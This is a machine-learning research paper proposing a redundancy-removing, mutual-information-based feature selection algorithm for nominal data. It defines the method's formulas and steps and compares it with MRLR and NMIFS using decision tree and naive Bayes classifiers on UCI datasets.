a redundancy-removing feature selection algorithm for nominal data submitted june accepted september published october corresponding author zhihua li, zhli@jiangnan.edu.cn academic editor feiping nie additional information and declarations can be found on page doi . /peerj-cs. copyright li and gu distributed under creative commons cc-by . open access a redundancy-removing feature selection algorithm for nominal data zhihua li , , , and wenqu gu , key laboratory of advanced process control for light industry ministry of education, jiangsu, china engineering research center of internet of things technology, application ministry of education, jiangsu, china department of computer science, engineering school of internet of things engineering, jiangnan university, jiangsu, china department of computer science, georgia state university, atlanta, ga, united states of america abstract no order correlation or similarity metric exists in nominal data, and there will always be more redundancy in a nominal dataset, which means that an efficient mutual information-based nominal-data feature selection method is relatively difficult to find. in this paper, a nominal-data feature selection method based on mutual information without data transformation, called the redundancy-removing more relevance less redundancy algorithm, is proposed. by forming several new information-related definitions and the corresponding computational methods, the proposed method can compute the information-related amount of nominal data directly. furthermore, by creating a new evaluation function that considers both the relevance and the redundancy globally, the new feature selection method can evaluate the importance of each nominal-data feature. although the presented feature selection method takes commonly used mifs-like forms, it is capable of handling high-dimensional datasets without expensive computations. we perform extensive experimental comparisons of the proposed algorithm and other methods using three benchmarking nominal datasets with two different classifiers. the experimental results demonstrate the average advantage of the presented algorithm over the well-known nmifs algorithm in terms of the feature selection and classification accuracy, which indicates that the proposed method has a promising performance. subjects data mining and machine learning, data science keywords nominal data, feature selection, redundancy-removing, mutual information introduction there are two main feature reduction approaches in data analysis, feature extraction and feature selection (jain, duin & mao, ). feature extraction aims at creating new features that are based on transformations or combinations of the raw feature set, and feature selection means selecting one group of the most efficient features from a certain dataset according to certain evaluations that are based on the goodness of a feature, with the purpose of decreasing the feature dimensionality (jain, duin & mao, ; tesmer & estévez, ; john, kohavi & pfleger, ). this approach is one of the major methods how to cite this article li and gu ( ), a redundancy-removing feature selection algorithm for nominal data. peerj comput. sci. :e ; doi . /peerj-cs. mailto:zhli@jiangnan.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . 
/peerj-cs. of feature reduction for high-dimensional data. the evaluation basis includes (tesmer & estévez, ) various distance measurements (kira & rendel, ), a dependency measurement (modrzejejew, ), a consistency measurement (almuallim & dietterich, ), a probability density measurement (battiti, ), a rough set measurement (hu, xie & yu, ), an information measurement (kwak & ch, ; kwak & choi, ; torkkola, ) and some other derivations such as based on optimization strategies (hou, nie & li, ). regardless of which evaluation basis is taken, the goal is to keep the number of selected features as small as possible, to avoid increasing the computational cost of the learning algorithm as well as the classifier complexity (tesmer & estévez, ). there have been numerous studies in the literature about various feature selection algorithms that depend on different evaluation bases. among them, the information theory-based feature selection algorithm that operates with respect to the selected features and raw dataset can involve less work while processing the data after the optimization transformation and the maximization of the mutual information (mi) between class labels. the mutual information-based feature selection mifs (battiti, ) algorithm is based on this basis, which utilizes greedy selection to guarantee that candidate features of the evaluation function can satisfy the final effective features. after studying the cases of unbalance of the evaluation function in the mifs algorithm, the mifs-u (kwak & choi, ) algorithm was proposed. the adaptive feature selection criterion was studied, and then the amifs (tesmer & estévez, ) algorithm was presented to cater to feature selection in high-dimensional data. considering the max-dependency and min-redundancy as a whole, the mrmr (peng, long & ding, ) algorithm was given. by reconstructing the evaluation function, the nmifs (estévez, tesmer & perez, ) algorithm was then proposed. both the mrmr and nmifs algorithms can distinctly decrease the redundancy in the selected features. however, these algorithms also have their disadvantages. for example, mifs (battiti, ) and mifs-u (kwak & choi, ) fail to consider the mutual information between the candidate features with selected subsets and class labels as well as the influences of the classification results. according to the aforementioned algorithms, their approximation computing of mi can perform only continuous-attributed data. nominal data exist in a broad range of practical applications. this kind of data is typically characterized by having no order information, being discrete, and having semantics (chow, wang & ma, ). no similarity metric or order correlation (chow, wang & ma, ; tang & mao, ; minho & ramakrishna, ) exists in nominal data. the “distance” in pattern recognition is hard to identify in it, which makes the measurement of the similarity or dissimilarity difficult. given the existing characteristics of nominal data, some problems in the feature selection appear. due to having non-order information and discrete and non-metric data distributions, the features of different classes even intersect with one another (chow, wang & ma, ; li, yang & gu, ; minho & ramakrishna, ). thus, most well-known feature selection algorithms are unsuitable for nominal-data feature selection or nominal-data feature extraction. li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
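the point that nominal values carry no usable order or distance can be illustrated with a small sketch: integer-coding the values induces an arbitrary metric that changes with the coding, whereas a frequency-based, information-style view of the feature does not. the snippet is purely illustrative and is not taken from the paper.

```python
from collections import Counter
import math

colors = ["red", "blue", "green", "red", "green"]

# two equally valid integer codings of the same nominal feature
coding_a = {"red": 0, "blue": 1, "green": 2}
coding_b = {"green": 0, "red": 1, "blue": 2}

def dist(coding, x, y):
    return abs(coding[x] - coding[y])

# the "distance" between red and green depends entirely on the arbitrary coding
print(dist(coding_a, "red", "green"), dist(coding_b, "red", "green"))  # 2 vs 1

# an information amount computed from value frequencies is coding-independent
def info_amount(values):
    n = len(values)
    return -sum((c / n) * math.log2(c / n) for c in Counter(values).values())

print(round(info_amount(colors), 3))
```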
considering the above disadvantages specifically and aiming at the nominal-data feature selection and its specificity, this paper presents the new scheme of mi-based more relevance less redundancy (mrlr) through the redefinition of the features’ information amounts, the relevance degree between the features and the conditional mi as well as re-construction of the corresponding new approximation computation method for mi with respect to nominal data. on the other hand, through studying the evaluation function and specifically the insufficient consideration of redundancy between features in most evaluation functions, this paper also creates a new evaluation function for nominal data. the new evaluation function not only considers the correlation between features and class labels but also accounts for the mutual correlation between features. in this way, the computation of mi for nominal-data features can be solved, and at the same time, an overly high redundancy of the selected subset caused by the redundant features can also be overcome. combining the innovations together into a new method, the redundancy-removing mrlr redremovingmrlr algorithm is proposed. several experiments were arranged. a total of three benchmarking nominal datasets are employed to compare the effectiveness and the efficiency by the naive bayes classifier and the decision tree classifier on the selected subsets of redremovingmrlr, mrlr (gu & li, ) and nmifs algorithm. the experimental results show that the newly proposed scheme can deliver promising results. the remainder of this paper is organized as follows. the related work and the new definitions are introduced in ‘notation and related studies.’ in ‘the proposed algorithms,’ we derive the framework of the proposed feature selection algorithm redremovingmrlr. promising experimental results on benchmarking datasets are presented in ‘results and discussion,’ which are followed by the concluding remarks in ‘conclusions.’ notation and related studies the related studies are introduced in ‘related work,’ and some new definitions and necessary terminology are presented in ‘notation and definitions.’ related work in this paper, we also use mi, which addresses taking the mi as a matrix of relevance and re- dundancy among the features, to study the nominal-data feature selection methods. some of the literature about feature selection methods that are based on mi have been issued, and references (tesmer & estévez, ; battiti, ; kwak & choi, ; peng, long & ding, ; estévez, tesmer & perez, ; chow, wang & ma, ) are benchmarks. mifs (battiti, ) selects the features that maximize the information about the classes, which are corrected by subtracting a quantity that is proportional to the average mi of the previously selected features. when there are many irrelevant and redundant features, the performance of mifs degrades because it penalizes too much redundancy. mifs-u (kwak & choi, ) proposed an enhancement of the mifs algorithm that makes a better estimation of the mi between the input features and output classes. however, although mifs-u is usually better than mifs, its performance also degrades in the presence of many irrelevant and redundant features (estévez, tesmer & perez, ). li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. amifs (tesmer & estévez, ) presents an enhancement of mifs and mifs-u that overcomes their limitations in high-dimensional feature selection. 
an adaptive selection criterion is proposed in such a way that the trade-off between discarding redundancy or irrelevance is adaptively controlled (estévez, tesmer & perez, ), which eliminates the need for a user-predefined, fixed parameter. by deriving an equivalent form called the minimal-redundancy-maximal-relevance criterion for first-order incremental feature selection, mrmr (peng, long & ding, ) proposes a framework that minimizes redundancy and uses a series of intuitive measures of relevance and redundancy to select the most promising features. the mrmr algorithm can be combined with wrapper feature selection methods, first selecting good features according to the maximal statistical dependency criterion based on mi, and it can select promising features for both continuous and discrete datasets (peng, long & ding, ; estévez, tesmer & perez, ). nmifs (estévez, tesmer & perez, ) takes the average normalized mi as a measure of the redundancy among the features (tesmer & estévez, ); it is also an enhancement of the mifs, mifs-u, and mrmr methods, and it outperforms them without requiring a predefined parameter. ufsn (chow, wang & ma, ), in contrast, can directly handle nominal-data feature selection and avoids the shortcomings of converting data from nominal into binary form; nevertheless, ufsn depends on a clustering algorithm at the outset and has a high complexity for large datasets during the clustering process. this paper focuses on three issues that have not been covered in earlier work. first, the evaluation function of nmifs (estévez, tesmer & perez, ) is rewritten so that the presented algorithm applies a stronger penalty to redundancy than nmifs does. second, the new algorithm considers the redundancy and the relevance of the features as a whole, which nmifs does not; it realizes less redundancy and more relevance with respect to both the relationships among the features and the relationships between the features and the class labels. third, aiming at feature selection for nominal data by mi measurement and simplifying the computation of mi between nominal-data features, several new definitions are given. the experimental results show that the redremovingmrlr algorithm is effective in nominal-data feature selection.

notation and definitions

to realize nominal-data feature selection efficiently, several new definitions and the corresponding computing methods are first given, as follows.

definition (information amount): given the n values of the ith feature $f_i$, i.e., $\{a_1, a_2, \ldots, a_n\} \in f_i$, the information amount of $f_i$ can be expressed as
$i(f_i) = -\sum_{i=1}^{n} p_i \log_2(p_i)$ ( )
where $p_i$ represents the frequency of each value $a_i$ in $f_i$, namely $p_i = |a_i| / |f_i|$.

definition (conditional mutual information): the conditional mutual information between two different features $f_i$ and $f_j$ can be expressed as
$e(f_i; f_j) = -\sum_{j=1}^{m} p_j \, i(f_{ij})$ ( )
where $e(f_i; f_j)$ represents the dependence degree of the ith feature $f_i$ on the jth feature $f_j$ when $f_j$ is known; here, m denotes the number of values in $f_j$.

definition (relevance degree): according to the above definitions, the relevance degree between $f_i$ and $f_j$ can be expressed as
$g(f_i; f_j) = i(f_i) - e(f_j; f_i) = i(f_j) - e(f_i; f_j)$ ( )
from which it follows that the relevance degree between $f_i$ and $f_j$ is symmetric.
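to make the definitions above concrete, the following sketch computes the information amount of a nominal feature and a relevance degree between two features. it is a minimal illustration, not the authors' implementation: the extracted formulas leave the exact sign convention and argument order of $e(\cdot;\cdot)$ ambiguous, so the sketch follows the standard entropy reading in which the relevance degree reduces to the mutual information between the two nominal features.

```python
import math
from collections import Counter, defaultdict

def info_amount(values):
    """information amount of a nominal feature (cf. the definition of i(f_i)):
    -sum over values of p * log2(p), with p the relative frequency of a value."""
    n = len(values)
    return -sum((c / n) * math.log2(c / n) for c in Counter(values).values())

def dependence(fi, fj):
    """dependence degree of fi on fj (cf. the definition of e(f_i; f_j)), read here as
    the frequency-weighted information amount of fi within each value group of fj."""
    groups = defaultdict(list)
    for a, b in zip(fi, fj):
        groups[b].append(a)
    n = len(fj)
    return sum((len(g) / n) * info_amount(g) for g in groups.values())

def relevance(fi, fj):
    """relevance degree g(f_i; f_j): information amount of fi minus what remains of it
    once fj is known; symmetric under this reading."""
    return info_amount(fi) - dependence(fi, fj)

# toy nominal features: the first two columns are clearly related, the third is not
color = ["red", "red", "blue", "blue", "green", "green"]
shade = ["warm", "warm", "cold", "cold", "cold", "cold"]
noise = ["a", "b", "a", "b", "a", "b"]
print(round(relevance(color, shade), 3), round(relevance(color, noise), 3))
```

on the toy data, the related color/shade pair yields a clearly positive relevance degree, while the unrelated pair yields zero.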
definition 4. the preliminary evaluation function of the feature selection for nominal data on each $f_i$ can be expressed as

$J(f_i) = G(S \cup f_i; C) - \frac{1}{|S|} \sum_{f_s \in S} G(f_s; f_i)$ (4)

where $G(S \cup f_i; C)$ represents the relevance degree between the class labels $C$ and the selected subset $S$ after the candidate feature $f_i$ is added. the penalty factor $\beta$ used in mifs and mifs-u is a user-predefined parameter and is difficult to determine; to overcome this limitation, it is replaced here with $1/|S|$.

the proposed algorithms

considering the specificity of nominal-data feature selection, this paper performs the following research.

basic idea of the algorithms

based on the above, the algorithm should select features with maximum mi with the class labels. more concretely, the algorithm should also consider the mi between different features to avoid excessive feature redundancy; in this way, the uncertainty of the other features can be reduced to the maximum extent. the feature selection algorithm first chooses the feature with the largest relevance to the class labels. then, the relevance degrees between the candidate feature and the selected features, as well as the class labels, are computed. finally, the feature that has more relevance to the class labels and less redundancy with the selected features is selected. after several iterations, a selected subset satisfying the conditions is obtained.

redundancy-removing feature selection algorithm

inspired by nmifs (estévez, tesmer & perez, ), the mi between the candidate feature $f_i$ in the dataset and a selected feature $f_s$ in the subset $S$ is shown in formula (5):

$MI(f_i; f_s) = H(f_i) - H(f_i \mid f_s) = H(f_s) - H(f_s \mid f_i)$ (5)

where $H(f_i)$ and $H(f_s)$ represent the entropies of the features and $H(f_i \mid f_s)$, $H(f_s \mid f_i)$ the corresponding conditional entropies. from formula (5), it follows that

$0 \le MI(f_i, f_s) \le \min\{H(f_i), H(f_s)\}$. (6)

furthermore, the concept of a redundancy evaluation operator (peng, long & ding, ; estévez, tesmer & perez, ) is introduced here, shown in formula (7); it aims to evaluate the degree of redundancy between the features:

$NMI(f_i; f_s) = \frac{MI(f_i; f_s)}{\min\{H(f_i), H(f_s)\}}$ (7)

from formula (7), it can be seen that $NMI(f_i; f_s) \in [0, 1]$. when $NMI(f_i; f_s) = 0$, the two features are mutually independent, whereas $NMI(f_i; f_s) = 1$ means that there is great redundancy between the candidate feature $f_i$ and the selected features. on the basis of mifs (battiti, ), nmifs (estévez, tesmer & perez, ) evolved a new redundancy matrix operator for the evaluation function and then proposed the nmifs algorithm (estévez, tesmer & perez, ), which selects the candidate feature $f_i$ with the maximum evaluation function value as the preferred feature and adds it to the selected subset $S$. the greatest contribution of the nmifs algorithm is that it automatically prevents features that have more redundancy with the selected subset from being chosen during the selection process (estévez, tesmer & perez, ). however, the nmifs algorithm can adapt only to continuous-attributed data instead of nominal data. therefore, inspired by the redundancy-removing idea in the nmifs algorithm, formula (4) is modified into formula (8):

$J(f_i) = G(S \cup f_i; C) - \frac{1}{|S|} \sum_{f_s \in S} \frac{G(f_s; f_i)}{\min\{H(f_i), H(f_s)\}}$. (8)
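the redundancy operator of formula (7) and the evaluation functions of formulas (4) and (8) can be sketched as follows, reusing the helpers from the previous snippet; here the joint relevance term g(s ∪ fi; c) is simplified to g(fi; c), and the entropies h(·) are replaced by the information amounts of the nominal features, both of which are simplifying assumptions made for illustration.

```python
def normalized_redundancy(fi, fs):
    """Redundancy operator in the spirit of formula (7): the relevance degree
    G(fs; fi) scaled by the smaller information amount of the two features
    (the information amount stands in for the entropy H for nominal data)."""
    denom = min(information_amount(fi), information_amount(fs))
    return 0.0 if denom == 0 else relevance_degree(fs, fi) / denom

def evaluation_preliminary(candidate, selected, labels):
    """Formula (4): relevance to the class labels minus the average
    (unnormalized) relevance degree with the already selected features;
    the joint term G(S u fi; C) is simplified to G(fi; C) here."""
    relevance = relevance_degree(candidate, labels)
    if not selected:
        return relevance
    return relevance - sum(relevance_degree(fs, candidate) for fs in selected) / len(selected)

def evaluation_mean(candidate, selected, labels):
    """Formula (8): the same relevance term penalized by the average
    normalized redundancy with the selected subset."""
    relevance = relevance_degree(candidate, labels)
    if not selected:
        return relevance
    return relevance - sum(normalized_redundancy(fs, candidate) for fs in selected) / len(selected)
```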
it is clear that the redundancy between the candidate features and the selected features is measured by formula (8). thus, formula (8) can always be used to evaluate whether a candidate feature should finally be selected; that is, formula (8) can serve as an evaluation function. this brings two distinct advantages: (1) it is suitable for nominal data; and (2) it prevents features with high redundancy from being selected. to illustrate the second advantage, consider an extreme case in which $f_i$ has high redundancy with only one of the features in the subset $S$, whereas it has little or no redundancy with the other features. in this case, the value of $\frac{1}{|S|} \sum_{f_s \in S} \frac{G(f_s; f_i)}{\min\{H(f_i), H(f_s)\}}$ is small, and the candidate feature $f_i$ will certainly be selected into the subset $S$, which leaves the subset $S$ with considerable redundancy. to overcome this extreme case, the penalty factor in the evaluation function is adjusted: the second term in formula (8) is replaced with a stronger penalty factor, namely the second term of formula (9):

$J(f_i) = G(S \cup f_i; C) - \max_{f_s \in S} \left\{ \frac{G(f_s; f_i)}{\min\{H(f_i), H(f_s)\}} \right\}$. (9)

obviously, this extreme case can thus be overcome. based on the above, the redundancy-removing mrlr (redremovingmrlr) algorithm is summarized below.

algorithm: redremovingmrlr
step 1. initialization: let $F$ be the universal set of all features and $S$ the empty set; initialize the value of $k$, which represents the number of dimensions of the feature subset to be selected by the feature selection algorithm.
step 2. compute the relevance degree according to formula (3): for each feature $f_i \in F$, compute $G(f_i; C)$.
step 3. according to the results of step 2, select the feature $f_i$ with the maximum relevance degree $G(f_i; C)$, and set $F \leftarrow F - \{f_i\}$, $S \leftarrow \{f_i\}$.
step 4. for each $f_i$ among the candidate features, compute the preliminary evaluation value by formula (4). if the preliminary evaluation value of $f_i$ is less than or equal to the average, then compute the evaluation value of $f_i$ according to formula (8); if the preliminary evaluation value of $f_i$ is greater than the average, then compute the evaluation value of $f_i$ according to formula (9).
step 5. select the feature $f_i$ with the maximum evaluation value as the next valid feature, and set $F \leftarrow F - \{f_i\}$, $S \leftarrow S \cup \{f_i\}$.
step 6. if $|S| = k$ is not yet satisfied, return to step 4.
step 7. output the subset $S$.

the process for determining $k$ in redremovingmrlr is as follows. at the beginning, the algorithm computes $r(F)/|F|$ on the raw dataset as the initial reference value. when an inflection point appears in the classification accuracy of the redremovingmrlr algorithm on the selected subset $S$ before and after the next candidate feature is added, redremovingmrlr computes $r(S)/|S|$. as soon as $r(S)/|S| \ge r(F)/|F|$ is satisfied, the size $|S|$ is taken as the value of $k$; specifically, $k = |S|$, and $|S| = k$ is the stopping condition of redremovingmrlr. here, $r(X)$ denotes the classification accuracy of the employed classifier on a selected subset or dataset $X$.
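the greedy selection loop of the redremovingmrlr listing can be sketched as below, again reusing the helpers defined above; the switch between the mean penalty of formula (8) and the max penalty of formula (9) follows the reading of step 4 given above, and the subset size k is passed as a fixed argument instead of being determined by the inflection-point rule, which is a simplification.

```python
def evaluation_max(candidate, selected, labels):
    """Formula (9): relevance penalized by the single most redundant selected
    feature, the stronger penalty used for the extreme case described above."""
    relevance = relevance_degree(candidate, labels)
    if not selected:
        return relevance
    return relevance - max(normalized_redundancy(fs, candidate) for fs in selected)

def red_removing_mrlr(features, labels, k):
    """Greedy selection sketch: features is a dict {name: column of nominal
    values}, labels is the class column, k is the desired subset size."""
    remaining = dict(features)
    # steps 2-3: start from the feature most relevant to the class labels
    first = max(remaining, key=lambda name: relevance_degree(remaining[name], labels))
    selected = [first]
    del remaining[first]
    while remaining and len(selected) < k:
        cols = [features[name] for name in selected]
        # step 4: preliminary (formula 4) scores for all candidates
        prelim = {name: evaluation_preliminary(col, cols, labels)
                  for name, col in remaining.items()}
        avg = sum(prelim.values()) / len(prelim)
        # candidates at or below the average keep the mean penalty (formula 8),
        # those above it get the stronger max penalty (formula 9)
        scores = {name: (evaluation_mean(remaining[name], cols, labels)
                         if prelim[name] <= avg
                         else evaluation_max(remaining[name], cols, labels))
                  for name in remaining}
        # steps 5-6: add the best candidate and repeat until |S| = k
        best = max(scores, key=scores.get)
        selected.append(best)
        del remaining[best]
    return selected
```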
the time cost of the redremovingmrlr algorithm consists mainly of two parts. one is the time to compute the relevance degree between the features, whose complexity can be noted as $mn\log_2 n$. the other is the time to obtain the final $k$ features of the subset $S$, which requires $k$ iterations; its complexity is therefore $kmn\log_2 n$, and the total time complexity of redremovingmrlr is $O(mn\log_2 n)$. at this point, the time complexity is the same as that of mifs and mifs-u, which clearly shows that the redremovingmrlr algorithm realizes nominal-data feature selection without increasing the time complexity.

however, the redremovingmrlr algorithm is not always the perfect approach: if the extreme feature $f_i$ is selected as the first feature in the subset $S$, then the algorithm is unable to obtain an optimal result. basically, it can be seen that the new evaluation function gives the algorithm strong application flexibility. the redremovingmrlr algorithm also employs the methods in mifs (battiti, ) and reference (hu, xie & yu, ) to compute $H(f_i)$ and $H(f_s)$ in the related formulas. although probability-equaling discretization is applied to continuous features, by summing the information entropy of each feature after discretization, mifs (battiti, ) and reference (hu, xie & yu, ) mainly focused on feature selection for continuous-attributed data. because nominal data are discrete, it is feasible to equivalently replace $H(f_i)$ and $H(f_s)$ in the formulas with the information entropy computed directly on the nominal features. therefore, these formulas can be taken directly as the evaluation methods for the redundancy between the candidate features and the selected nominal-data features.

results and discussion

experimental data sets

in this section, experiments are performed on benchmarking nominal datasets (table 1) from the uci machine learning repository (blake & merz, ). in each problem, all patterns that have missing feature values are removed beforehand. the dataset king-rook vs. king-pawn is abbreviated as krvs.

table 1: the experimental benchmarking nominal datasets employed in this manuscript (soybean, vehicle and krvs), with their numbers of features, patterns and classes.

experimental results

in this section, two experiments are arranged to test the feature selection performance, the redundancy-removing capability and the robustness of redremovingmrlr on nominal data. the decision tree classifier (brodley & utgoff, ) and the naive bayes classifier (liu, ) are employed to evaluate the nominal-data subsets. a comparative study between the different algorithms is performed in terms of three aspects, namely: (1) the number of finally selected features; (2) the classification accuracy of the selected feature subset using the different employed classifiers; and (3) the performance of the classification model created for the different classifiers, regarding both the feature selection complexity and the classification accuracy. starting from the feature subset selected by each compared algorithm, candidate features are added one by one until the entire raw dataset is covered, and a classification experiment is conducted to evaluate the performance of the algorithm. for nmifs, the best parameter is selected.
table 2: the subsets selected by the redundancy-removing mrlr (redremovingmrlr), mrlr and nmifs algorithms on the soybean, vehicle and krvs datasets (columns: dataset, full set size, and the number of features selected by mrlr, nmifs and redremovingmrlr).

table 3: the classification accuracy (mean ± standard deviation, %) of the decision tree classifier on the different subsets from table 2 for nmifs, mrlr and redremovingmrlr.

table 4: the classification accuracy (mean ± standard deviation, %) of the naive bayes classifier on the different subsets from table 2 for nmifs, mrlr and redremovingmrlr.

experiment 1. this experiment aims to quantitatively evaluate the applicability and effectiveness of redremovingmrlr, including a comparative study among redremovingmrlr, mrlr and the classical nmifs. several high-dimensional datasets (table 1) that contain redundant features (chow, wang & ma, ; tang & mao, ; li, yang & gu, ; chert & yang, ) from uci (blake & merz, ) are employed to evaluate the feature selection capability of the redremovingmrlr, mrlr and nmifs algorithms, while the naive bayes classifier and the decision tree classifier are used to test the effectiveness of the subsets selected by the different algorithms. this experiment illustrates the performance of redremovingmrlr, mrlr and nmifs on redundant-featured datasets. the experimental results are listed in tables 2, 3 and 4.

table 2 lists the feature subsets finally selected by the redremovingmrlr, mrlr and nmifs algorithms. the results show that the redremovingmrlr, nmifs and mrlr algorithms all have a strong feature-selecting capability for high-dimensional, redundant-featured datasets. from these results we obtain nine new subsets, $y_i \subset \{y_1, y_2, \ldots, y_9\}, i \in [1, 9]$, corresponding to the redremovingmrlr, mrlr and nmifs algorithms, respectively; in what follows they are called the basic feature-selected subsets. however, on the vehicle dataset the final subset selected by the redremovingmrlr algorithm is one dimension larger than that from the mrlr algorithm. on the whole, table 2 illustrates that the performance of redremovingmrlr is superior to mrlr and nmifs in terms of feature-selecting capability. table 3 lists the final classification accuracies obtained by the decision tree classifier on the nine basic feature-selected subsets, and table 4 lists those from the naive bayes classifier. for tables 3 and 4, to make the comparative study fair, the average value over repeated sets of classification results is taken as the estimate of the classification accuracy, obtained with repeated cross-validation on the corresponding subsets. from table 3, for the decision tree classifier, the classification accuracy of the redremovingmrlr algorithm on the different basic subsets is the best among the three compared algorithms; redremovingmrlr demonstrates its advantage over the mrlr and nmifs algorithms in feature-selecting capability and effectiveness. furthermore, the results show that the decision tree classifier is appropriate for classifying nominal data. for the naive bayes classifier, the classification accuracy of redremovingmrlr on the krvs subset is higher than that of the other two compared algorithms.
the main reason is that there exists not only redundancy but also strong relevance between the features of the krvs dataset (tang & mao, ; tang & mao, ). additionally, the classification accuracy of redremovingmrlr on the soybean subset is lower than that of the other two compared algorithms, whereas on the vehicle subset it is higher than that of the nmifs algorithm and lower than that of the mrlr algorithm. from this analysis, we find that the main reason for these distinct differences lies in the classification principles implemented in the classifiers, namely, the different theorems on which the different classifiers are based. the decision tree classifier primarily operates by selecting classification features based on the acquired information, for example, selecting one or a few key features as the root node; it then classifies the data items into different classes along the branches of the tree built from the dataset. moreover, each feature in the selected subsets is treated as independent, and which one acts as the root node of the tree should not affect the final classification results; the more independent the selected features are, the less influence they have on the classification results. on the other hand, the naive bayes classifier classifies the data items according to the probability densities of the values of the different features. however, before and after feature selection, the probability density of the features differs between the raw dataset and the selected subset; thus, the classification results are diverse. as a result, the difference in the results is due to the different classification principles of the classifiers rather than to the classification mechanism itself. therefore, the results reflect two factors: (1) the specificity of nominal data, i.e., its non-metric, unordered and disparate characteristics; and (2) the decision tree classifier being more suitable for classifying nominal data.

experiment 2. this experiment aims to evaluate the efficiency and robustness of redremovingmrlr, again with a comparative study among redremovingmrlr, mrlr and the classical nmifs. the same datasets as in experiment 1, i.e., $y_i, i \in [1, 9]$, are the subject of experimentation. the experimental examples at each step are generated from one of the basic feature-selected subsets (from experiment 1) by adding features one at a time, one dimension per step, in descending order of the values of the evaluation function given by formula (8) or (9). in this way, a series of new temporary subsets is formed, one after each feature is added; to describe the context clearly, we call them temporary subsets. for each temporary subset, the decision tree classifier and the naive bayes classifier are trained, and the two classification results are recorded at each step until all of the features have been added. the experimental results are shown in the accuracy figures for soybean, vehicle and krvs below. furthermore, to make the comparative study fair, the average value over repeated runs of classification results is taken as the estimate of the classification accuracy, and repeated cross-validation on each temporary subset is adopted for each algorithm.
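the evaluation protocol for one selected (or temporary) subset can be sketched with scikit-learn as follows; the one-hot encoding of the nominal features and the choice of ten folds repeated ten times are assumptions made for illustration, since the exact settings are not fully specified here.

```python
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import OneHotEncoder
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import BernoulliNB
from sklearn.model_selection import RepeatedStratifiedKFold, cross_val_score

def score_subset(X_nominal, y, classifier):
    """Mean and standard deviation of the accuracy of one classifier on one
    selected subset, estimated with repeated stratified k-fold cross-validation.
    X_nominal: 2-D array of nominal (string/categorical) feature values."""
    model = make_pipeline(OneHotEncoder(handle_unknown='ignore'), classifier)
    cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=0)
    scores = cross_val_score(model, X_nominal, y, cv=cv, scoring='accuracy')
    return scores.mean(), scores.std()

# hypothetical usage for the two classifiers employed in the experiments:
# acc_dt = score_subset(X_subset, y, DecisionTreeClassifier(random_state=0))
# acc_nb = score_subset(X_subset, y, BernoulliNB())
```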
panels (a) and (b) of the soybean figure show the classification results on the soybean dataset obtained by the decision tree classifier and the naive bayes classifier, respectively. both classifiers approximately achieve their highest classification accuracy already on the basic selected subset, without adding any other features. from these panels, we can readily see that redremovingmrlr has the best classification accuracy in most of the cases and remains competitive with nmifs and/or mrlr even when redremovingmrlr does not achieve the best classification result. the classification accuracy of redremovingmrlr also remains stable. this indicates the advantage of redremovingmrlr over nmifs and mrlr in robustness, in an average sense, and shows that redremovingmrlr is resistant to outer interference.

panel (a) of the vehicle figure shows the generalization accuracy of the decision tree classifier that uses as inputs the temporary subsets of features selected by redremovingmrlr, nmifs and mrlr. it can be seen that the best results are obtained with redremovingmrlr once a sufficient number of features is reached, each algorithm achieves its best classification accuracy near the size of its basic selected subset, and redremovingmrlr outperforms nmifs and mrlr for any number of features. panel (b) shows the generalization accuracy of the naive bayes classifier for the redremovingmrlr, nmifs and mrlr algorithms; here mrlr outperforms nmifs and redremovingmrlr for any number of features. the vehicle figure as a whole demonstrates the complete accuracy curves on the vehicle dataset for the three algorithms with the two classifiers. it can easily be seen that the variation tendencies of the classification accuracy are the same or similar, and after reaching the full feature set, the classification accuracy of the different classifiers coincides. from these experimental results, we find that (1) redremovingmrlr, mrlr and nmifs all have redundancy-distinguishing capabilities; (2) the theoretical basis of the classifiers certainly affects the classification results, but the effect is limited; and (3) little interdependency exists in the vehicle dataset besides the redundancy. the figures also show the best results obtained at the size of the basic feature-selected subsets for each compared algorithm; for the two classifiers, the classification results using the features selected by redremovingmrlr are even better than those using the entire dataset.

figure: the generalization classifier accuracy on soybean by different classifiers; (a) shows the accuracy results on soybean by the decision tree classifier and (b) by the naive bayes classifier.

on the krvs dataset, panel (a) shows that the changing trend of the classification accuracy of redremovingmrlr is similar to that of the mrlr algorithm, and it retains a relatively high classification rate. although nmifs behaves better for a small number of features at the beginning, it also has relatively good classification rates once more features are added; however, in the middle interval, where it selects some irrelevant or redundant features earlier than the relevant ones, nmifs performs badly.
figure: the generalization classifier accuracy on vehicle by different classifiers; (a) shows the accuracy results on vehicle by the decision tree classifier and (b) by the naive bayes classifier.

panel (b) shows that the variation trends of the classification accuracy for the three compared algorithms are similar; on the whole, the features are added in the desired descending order. beyond a certain number of features, the classification accuracy of the nmifs algorithm is far lower than that of the other compared algorithms; this indicates that the performance of nmifs is influenced by the order in which the relevant, redundant and irrelevant features are selected. on the whole, from tables 2, 3 and 4 and the accuracy figures, apart from some wavering variation in panel (b) of the krvs figure for the naive bayes classifier with the redremovingmrlr algorithm, redremovingmrlr outperforms mrlr and nmifs with and without mutations, finding the best solution with a smaller number of features. the classification accuracy using the features selected by redremovingmrlr is even better than that obtained using the entire dataset.

figure: the generalization classifier accuracy on krvs by different classifiers; (a) shows the accuracy results on krvs by the decision tree classifier and (b) by the naive bayes classifier.

from these experimental results, we find that (1) redremovingmrlr always selects the features in the ideal selection order: first the relevant features, in the desired descending order, then the redundant features, and last the irrelevant features, rather than the converse order; on some krvs-like datasets, both mrlr and nmifs select some irrelevant features earlier than the redundant ones because they penalize redundancy too heavily; (2) the experimental results indicate that redremovingmrlr can be applied effectively to nominal datasets with high-dimensional features and has a relatively stronger redundancy-recognizing capability; and (3) the feature selection strategy utilized in redremovingmrlr is practical, and the redundancy matrix operator expressed in formula (7), together with its modifications in formulas (8) and (9), makes it robust.

conclusions

